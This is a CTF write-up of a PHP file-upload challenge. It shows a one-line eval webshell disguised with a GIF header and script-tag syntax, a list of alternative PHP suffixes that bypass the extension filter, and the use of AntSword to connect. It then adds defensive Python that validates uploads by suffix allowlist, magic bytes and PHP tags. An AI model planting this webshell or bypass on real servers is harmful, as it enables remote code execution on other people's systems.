Geek challenge 2019 upload 1
2022-04-21 09:07:00 【xinjuun】
This is another file upload challenge. Uploading a one-line webshell with its suffix changed to jpg fails: the server reports that the file contains `<?` and rejects it. So change the webshell to:
GIF89a? <script language="php">eval($_REQUEST[123])</script>
Open Burp and modify the file suffix in the captured request.
The php suffix cannot be uploaded.
Common alternative suffixes are:
php2, php3, php4, php5, phps, pht, phtm, phtml
Changing the suffix to phtml here lets the file upload normally.

The save path of the image is not returned after uploading. Uploaded pictures are generally saved in upload, and that is the case here too. Connecting with AntSword succeeds, and the flag file can be found.
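A defender's view of the two gaps this write-up relies on, as an added example that is not part of the original post. `weak_filter` is an assumed model of the challenge's checks (only the `php` suffix and the `<?` string are rejected), `strict_filter` is a hypothetical allowlist-based replacement, and the file names are constructed.

```python
import re

# Constructed sample: the upload body shown in the write-up above.
SAMPLE = b'GIF89a? <script language="php">eval($_REQUEST[123])</script>'

def weak_filter(filename, data):
    """Assumed model of the challenge: blocklist one suffix and one tag."""
    suffix = filename.rsplit(".", 1)[-1].lower()
    return suffix != "php" and b"<?" not in data

# Hardened check: allowlist of image suffixes, each tied to its magic bytes.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# PHP open tags: <?php, <?=, short <?, and <script language="php">
# (the script form was removed in PHP 7.0 but still runs on PHP 5).
PHP_TAG = re.compile(rb"<\?|<script[^>]*language\s*=\s*[\"']?php", re.I)

def strict_filter(filename, data):
    """Return (accepted, reason); accept only allowlisted image uploads."""
    if filename.count(".") != 1:
        return False, "filename must have exactly one suffix"
    suffix = filename.rsplit(".", 1)[1].lower()
    if suffix not in MAGIC:
        return False, "suffix not in allowlist"
    if not data.startswith(MAGIC[suffix]):
        return False, "magic bytes do not match suffix"
    if PHP_TAG.search(data):
        return False, "PHP open tag in content"
    return True, "ok"

if __name__ == "__main__":
    for name in ("shell.php", "shell.phtml", "shell.gif"):
        print(name, weak_filter(name, SAMPLE), strict_filter(name, SAMPLE))
```

Content scanning is only a backstop, since binary image data can contain `<?` by chance. The controls that matter are the suffix allowlist, a server-generated file name, and an upload directory where the web server does not execute scripts.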
Copyright notice
This article was written by [xinjuun]. Please include the original link when reposting. Thank you.
https://yzsam.com/2022/04/202204210901289558.html